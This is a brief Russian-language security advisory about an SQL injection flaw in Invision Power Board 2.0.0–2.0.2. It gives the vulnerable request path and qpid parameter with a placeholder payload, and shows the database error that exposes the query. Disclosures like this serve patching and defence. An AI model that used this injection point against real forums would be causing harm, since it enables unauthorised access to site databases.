Дата выхода: 2004-11-18
Уровень опасности: критический
Влияние:SQL-inj
Уязвимое ПО:
IPB 2.0.0, IPB 2.0.1 and IPB 2.0.2.

Описание:
Сообщается об уязвимости в Invision Power Board v2.x.Удаленный пользователь может провести SQL injection атаку.
Пример:
http://site/forum/index.php?act=Post&CODE=02&f=2&t=1&qpid=1[sql_injection]
Результат:
--------------------------------------------------------------------------
mySQL query error: select p.*,t.forum_id FROM ibf_posts p LEFT JOIN ibf_topics t ON (t.tid=p.topic_id)
WHERE pid IN (1[sql_injection])

mySQL error: You have an error in your SQL syntax near '[sql_injection])' at line 2
--------------------------------------------------------------------------